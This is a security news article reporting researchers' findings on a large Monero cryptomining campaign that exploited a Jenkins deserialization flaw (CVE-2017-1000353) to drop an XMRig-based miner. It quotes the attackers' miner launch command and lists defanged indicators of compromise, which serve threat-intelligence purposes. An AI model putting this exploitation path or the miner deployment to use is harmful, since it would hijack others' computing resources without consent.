Monday, October 7, 2024
HomeCryptocurrency hackBiggest Crypto-Mining Campaign Ever - Hackers Mine $3 Million Worth of Monero...

Biggest Crypto-Mining Campaign Ever – Hackers Mine $3 Million Worth of Monero Crypto-currency

Published on

Security researchers from Checkpoint discovered a largest Monero mining activity that uses XMRig miner on various versions of Windows machines.

The hacker group earned more than $3 million worth Monero coins, and now to speed up their mining process they are targeting powerful Jenkins CI server.

Past few year Crypto currency mining is a very easy method for cyber criminals to Generating the huge revenue by hijacking the Web- browser and injecting the malicious script and taking control of the CPU Usage from the Victims.

- Advertisement - EHA

Mining cryptocurrencies in a legitimate way are quite resource consuming process, so attackers demanding ransom payments and infecting other computers to mine the cryptocurrencies.

How Attackers Inject Monero Mining Payloads

To install Monero mining payloads attackers leverage the known vulnerability CVE-2017-1000353 in the Jenkins Java deserialization implementation which accepts any serialized objects.

Attackers exploit the vulnerability by sending multiple successive session requests to CLI Interface.

Researchers said “After the first request, the second request that contains crafted packets will be sent immediately. The First request is to identify the client capabilities and the second one consist of the Monero miner payload”.
Monero mining

The malicious code initiates the hidden PowerShell to run the scripts in the background and downloads final Monero miner payload minerxmr.exe to windows servers. And later on, start command will be executed to start the mining process.

START C:\\Windows\\minerxmr.exe

Researchers said “The operation uses a hybridization of a Remote Access Trojan (RAT) and XMRig miner over the past months to target victims around the globe. The miner is capable of running on many platforms and Windows versions.”

The mining operation is well planned and executed in wild, they used a number of mining-pools to collect payments from victims, but all the funds deposited to only one wallet.As of now $3 million has been mined.

2017 is the year of data breaches and ransomware, now attackers shifted their focus to crypto mining attacks by using victims resources. Starting from the year 2018 a number of Cryptomining Attacks launched to Mine Monero Cryptocurrency.

Last week Attackers hijacked 4275 websites to inject Coinhive Monero miner including the websites of government authorities(ico.org.uk), NHS Foundation (nhs.uk), and uscourts.gov.

More than 500 million computers are mining cryptoCurrency in their browsers without the user’s knowledge and also the chrome extension started mining cryptocurrency.

Also, the Oracle Weblogic vulnerability (CVE 2017-10271) abused to run crypto miners and hijacking their processing power to mine Monero coins makes the spike in CPU usage.

IoC

Domain and IP:

  • 222[.]184[.]79[.]11
  • 183[.]136[.]202[.]244
  • btc[.]poolbt[.]com
  • shell[.]poolbt[.]com
  • xmr[.]btgirl[.]com[.]cn
  • btc[.]btgirl[.]com[.]cn

File:

  • 0bb4503cc52530ddadb102fa4010fb4d89af88aca846d4b16f601d0702134246
  • 06f8eda46fd6bdc11b8ec4d18a0f0afbf3d47f82cea8363d342975896582a715
  • f0430130a2f3549b1aeff0a9fb2246f68f585a7c1d312c7be385a1cf5f37e70d
  • c87d294cb0384cb56f4829d58cdd3f53572d3f95c2133a9b1da5f5bc1710f22f
  • f750d6da918a5f2f2c442a339821ffebcad4b61e4ca1684bac0e7df98416a794
  • 3002551eebaf486d77a2b81d87db553ad8632bb132553e306395c5da589171fe
  • 213a23219ff89c412f92aa1fdf7152178a81514014ee1cc4ffee97e725ee63a3
  • ff8c97cd55523cbdceef80407269d35bbf78abcbf807426c12d9debe1ce498d9
  • 2beaa23907c40cfcb705844f4f515ff81a788abe1aed2c8d23626d9d735968ae
  • b22fa98c3ee99222c4e827a9745f206ccf7cd40530459a92f183e148b0df5ce9
Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Hybrid Analysis Utilizes Criminal IP’s Robust Domain Data for Better Malware Detection

Criminal IP, a renowned Cyber Threat Intelligence (CTI) search engine developed by AI SPERA,...

RCE Vulnerability (CVE-2024-30052) Allow Attackers To Exploit Visual Studio via Dump Files

The researcher investigated the potential security risks associated with debugging dump files in Visual...

Cacti Network Monitoring Tool Vulnerability Let Attackers Execute Remote Code

A critical security vulnerability has been identified in the Cacti network monitoring tool that...

Microsoft & DOJ Dismantles Hundreds of Websites Used by Russian Hackers

Microsoft and the U.S. Department of Justice (DOJ) have disrupted the operations of Star...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Critical Atlassian Vulnerability Exploited To Connect Servers In Mining Networks

Hackers usually shift their attention towards Atlassian due to flaws in its software, especially...

Log4j Vulnerability Exploited Again To Deploy Crypto-Mining Malware

Recent attacks exploit the Log4j vulnerability (Log4Shell) by sending obfuscated LDAP requests to trigger...

Hackers Abused StackExchange Platform To Deliuver Malicious Python Package

Attackers uploaded malicious Python packages targeting Raydium and Solana users to PyPI, leveraging a...